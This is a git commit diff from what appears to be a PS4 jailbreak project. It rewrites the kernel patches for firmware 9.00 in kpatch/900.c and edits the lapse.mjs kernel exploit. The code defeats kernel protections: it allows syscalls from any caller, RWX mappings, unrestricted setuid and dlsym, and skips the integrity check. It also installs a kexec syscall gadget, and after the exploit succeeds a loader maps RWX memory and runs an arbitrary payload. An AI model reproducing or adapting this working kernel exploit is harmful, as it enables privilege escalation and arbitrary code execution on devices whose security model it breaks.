Some Clean-Up

Co-Authored-By: Jānis <97699850+janisslsm@users.noreply.github.com>

kpatch/900.c

@@ -16,6 +16,7 @@ You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
 #include <stddef.h>
+#include <string.h>
 
 #include "types.h"
 #include "utils.h"
@@ -57,52 +58,123 @@ void do_patch(void) {
     void * const kbase = (void *)rdmsr(0xC0000082) - off_fast_syscall;
 
     disable_cr0_wp();
-    //ChendoChap Patches For 900
-    const size_t KERNEL_enable_syscalls_1 = 0x490;
-    const size_t KERNEL_enable_syscalls_2 = 0x4B5;
-    const size_t KERNEL_enable_syscalls_3 = 0x4B9;
-    const size_t KERNEL_enable_syscalls_4 = 0x4C2;
-    const size_t KERNEL_mprotect = 0x80B8D;
-    const size_t KERNEL_prx = 0x23AEC4;
-    const size_t KERNEL_mmap_1 = 0x16632A;
-    const size_t KERNEL_mmap_2 = 0x16632D;
-    const size_t KERNEL_dlsym_1 = 0x23B67F;
-    const size_t KERNEL_dlsym_2 = 0x221b40;
-    const size_t KERNEL_setuid = 0x1A06;
-    const size_t KERNEL_bzero = 0x2713FD;
-    const size_t KERNEL_pagezero = 0x271441;
-    const size_t KERNEL_memcpy = 0x2714BD;
-    const size_t KERNEL_pagecopy = 0x271501;
-    const size_t KERNEL_copyin = 0x2716AD;
-    const size_t KERNEL_copyinstr = 0x271B5D;
-    const size_t KERNEL_copystr = 0x271C2D;
-    const size_t KERNEL_veriPatch = 0x626874;
-    const size_t KERNEL_setcr0_patch = 0x3ade3B;
-    write32(kbase, KERNEL_enable_syscalls_1, 0);
-    write16(kbase, KERNEL_enable_syscalls_2, 0x9090);
-    write16(kbase, KERNEL_enable_syscalls_3, 0x9090);
-    write8(kbase, KERNEL_enable_syscalls_4, 0xEB);  
-    write8(kbase, KERNEL_mmap_1, 0x37);
-    write8(kbase, KERNEL_mmap_2, 0x37);
-    write32(kbase, KERNEL_mprotect, 0);      
-    write8(kbase, KERNEL_dlsym_1, 0xEB);
-    write32(kbase, KERNEL_dlsym_2, 0xC3C03148);
-    write8(kbase, KERNEL_setuid, 0xEB);
-    write16(kbase, KERNEL_prx, 0xE990);
-    write8(kbase, KERNEL_bzero, 0xEB);
-    write8(kbase, KERNEL_pagezero, 0xEB);
-    write8(kbase, KERNEL_memcpy, 0xEB);
-    write8(kbase, KERNEL_pagecopy, 0xEB);
-    write8(kbase, KERNEL_copyin, 0xEB);
-    write8(kbase, KERNEL_copyinstr, 0xEB);
-    write8(kbase, KERNEL_copystr, 0xEB);
-    write16(kbase, KERNEL_veriPatch, 0x9090);
-    write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
-        
+
+    // patch amd64_syscall() to allow calling syscalls everywhere
+
+    // struct syscall_args sa; // initialized already
+    // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
+    // int is_invalid_syscall = 0
+    //
+    // // check the calling code if it looks like one of the syscall stubs at a
+    // // libkernel library and check if the syscall number correponds to the
+    // // proper stub
+    // if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
+    //     || sa.code != (u32)(code >> 0x10)
+    // ) {
+    //     // patch this to " = 0" instead
+    //     is_invalid_syscall = -1;
+    // }
+    write32(kbase, 0x490, 0);
+    // these code corresponds to the check that ensures that the caller's
+    // instruction pointer is inside the libkernel library's memory range
+    //
+    // // patch the check to always go to the "goto do_syscall;" line
+    // void *code = td->td_frame->tf_rip;
+    // if (libkernel->start <= code && code < libkernel->end
+    //     && is_invalid_syscall == 0
+    // ) {
+    //     goto do_syscall;
+    // }
+    //
+    // do_syscall:
+    //     ...
+    //     lea     rsi, [rbp - 0x78]
+    //     mov     rdi, rbx
+    //     mov     rax, qword [rbp - 0x80]
+    //     call    qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
+    //
+    // sy_call() is the function that will execute the requested syscall.
+    write16(kbase, 0x4b5, 0x9090);
+    write16(kbase, 0x4b9, 0x9090);
+    write8(kbase, 0x4c2, 0xeb);
+
+    // patch sys_mmap() to allow rwx mappings
+
+    // patch maximum cpu mem protection: 0x33 -> 0x37
+    // the ps4 added custom protections for their gpu memory accesses
+    // GPU X: 0x8 R: 0x10 W: 0x20
+    // that's why you see other bits set
+    // ref: https://cturt.github.io/ps4-2.html
+    write8(kbase, 0x16632a, 0x37);
+    write8(kbase, 0x16632d, 0x37);
+
+    // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
+    //
+    // this check is skipped after the patch
+    //
+    // if ((new_prot & current->max_protection) != new_prot) {
+    //     vm_map_unlock(map);
+    //     return (KERN_PROTECTION_FAILURE);
+    // }
+    write32(kbase, 0x80b8d, 0);
+
+    // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
+
+    // call    ...
+    // mov     r14, qword [rbp - 0xad0]
+    // cmp     eax, 0x4000000
+    // jb      ... ; patch jb to jmp
+    write8(kbase, 0x23B67F, 0xeb);
+    // patch called function to always return 0
+    //
+    // sys_dynlib_dlsym:
+    //     ...
+    //     mov     edi, 0x10 ; 16
+    //     call    patched_function ; kernel_base + 0x951c0
+    //     test    eax, eax
+    //     je      ...
+    //     mov     rax, qword [rbp - 0xad8]
+    //     ...
+    // patched_function: ; patch to "xor eax, eax; ret"
+    //     push    rbp
+    //     mov     rbp, rsp
+    //     ...
+    write32(kbase, 0x221B40, 0xC3C03148);
+
+    // patch sys_setuid() to allow freely changing the effective user ID
+
+    // ; PRIV_CRED_SETUID = 50
+    // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
+    // test eax, eax
+    // je ... ; patch je to jmp
+    write8(kbase, 0x1A06, 0xeb);
+
+    // patch sysveri to prevent delayed panics
+    write16(kbase, 0x626874, 0x9090);
+
+    // overwrite the entry of syscall 11 (unimplemented) in sysent
+    //
+    // struct args {
+    //     u64 rdi;
+    //     u64 rsi;
+    //     u64 rdx;
+    //     u64 rcx;
+    //     u64 r8;
+    //     u64 r9;
+    // };
+    //
+    // int sys_kexec(struct thread td, struct args *uap) {
+    //     asm("jmp qword ptr [rsi]");
+    // }
+
+    // sysent[11]
     const size_t offset_sysent_11 = 0x1100520;
+    // .sy_narg = 6
     write32(kbase, offset_sysent_11, 6);
+    // .sy_call = gadgets['jmp qword ptr [rsi]']
     write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
-    write32(kbase, offset_sysent_11 + 0x2c, 1);  
+    // .sy_thrcnt = SY_THR_STATIC
+    write32(kbase, offset_sysent_11 + 0x2c, 1);
    
     enable_cr0_wp();
 }

lapse.mjs

@@ -142,9 +142,7 @@ const leak_len = 16;
 const num_leaks = 5;
 const num_clobbers = 8;
 
-var nogc = [];
 let chain = null;
-
 async function init() {
     await rop.init();
     chain = new Chain();
@@ -1471,7 +1469,6 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
     kmem.write64(w_rthdr_p, 0);
     log('corrupt pointers cleaned');
 
-    
     /*
     // REMOVE once restore kernel is ready for production
     // increase the ref counts to prevent deallocation
@@ -1519,6 +1516,18 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
     // .sy_thrcnt = SY_THR_STATIC
     kmem.write32(sysent_661.add(0x2c), 1);
 
+    log('change sys_execv() to sys_kexec()');
+
+    const offset_sysent_11 = 0x1100520;
+    const sysent_11 = kbase.add(offset_sysent_11);
+
+    // .sy_narg = 2
+    kmem.write32(sysent_11, 6);
+    // .sy_call = gadgets['jmp qword ptr [rsi]']
+    kmem.write64(sysent_11.add(8), kbase.add(0x4c7ad));
+    // .sy_thrcnt = SY_THR_STATIC
+    kmem.write32(sysent_11.add(0x2c), 1);
+
     log('add JIT capabilities');
     // TODO just set the bits for JIT privs
     // cr_sceCaps[0]
@@ -1608,7 +1617,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
     kmem.write64(sysent_661.add(8), sy_call);
     // .sy_thrcnt = SY_THR_STATIC
     kmem.write32(sysent_661.add(0x2c), sy_thrcnt);
-    
     alert("kernel exploit succeeded!");
 }
 
@@ -1743,9 +1751,7 @@ export async function kexploit() {
     }
 }
 
-//For some reason this payload loader version does KP. 
-/*kexploit().then(() => {
-    var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
+kexploit().then(() => {
     var payload_loader = new View4(window.pld);
     chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
     const ctx = new Buffer(0x10);
@@ -1757,45 +1763,6 @@ export async function kexploit() {
         pthread.addr,
         0,
         payload_loader.addr,
-        payload_buffer,
-    );
-})*/
-
-
-kexploit().then(() => {
-    function malloc(sz) {
-        var backing = new Uint8Array(0x10000 + sz);
-        nogc.push(backing);
-        var ptr = mem.readp(mem.addrof(backing).add(0x10));
-        ptr.backing = backing;
-        return ptr;
-    }
-
-    function malloc32(sz) {
-        var backing = new Uint8Array(0x10000 + sz * 4);
-        nogc.push(backing);
-        var ptr = mem.readp(mem.addrof(backing).add(0x10));
-        ptr.backing = new Uint32Array(backing.buffer);
-        return ptr;
-    }
-    window.pld_size = new Int(0x26200000, 0x9);
-
-    var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
-    var payload = window.pld;
-    var bufLen = payload.length * 4
-    var payload_loader = malloc32(bufLen);
-    var loader_writer = payload_loader.backing;
-    for (var i = 0; i < payload.length; i++) {
-        loader_writer[i] = payload[i];
-    }
-    chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
-    var pthread = malloc(0x10);
-
-    call_nze(
-        'pthread_create',
-        pthread,
         0,
-        payload_loader,
-        payload_buffer,
     );
 })